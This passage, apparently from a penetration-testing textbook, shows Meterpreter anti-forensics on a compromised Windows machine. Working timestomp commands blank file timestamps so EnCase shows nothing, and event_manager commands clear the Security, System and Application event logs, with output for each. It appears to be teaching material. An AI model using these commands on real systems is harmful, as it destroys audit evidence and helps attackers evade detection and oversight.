Simulated Penetration Test
265
OPTIONS:
-a <opt> Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the "creation" time of the file
-e <opt> Set the "mft entry modified" time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file
meterpreter >
timestomp C:\\boot.ini -b
[*] Blanking file MACE attributes on C:\boot.ini
meterpreter >
In this example, we changed the timestamp so that when Encase (a popular
forensics analysis tool) is used, the timestamps are blank.
The tool
event_manager
will modify event logs so that they don’t show any
information that might reveal that an attack occurred. Here it is in action:
meterpreter >
run event_manager
Meterpreter Script for Windows Event Log Query and Clear.
OPTIONS:
-c <opt> Clear a given Event Log (or ALL if no argument specified)
-f <opt> Event ID to filter events on
-h Help menu
-i Show information about Event Logs on the System and their configuration
-l <opt> List a given Event Log.
-p Supress printing filtered logs to screen
-s <opt> Save logs to local CSV file, optionally specify alternate folder in which to
save logs
meterpreter >
run event_manager -c
[-] You must specify an eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] MailCarrier 2.0:
[*] Clearing MailCarrier 2.0
[*] Event Log MailCarrier 2.0 Cleared!
[*] Security:
[*] Clearing Security
[*] Event Log Security Cleared!
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
meterpreter >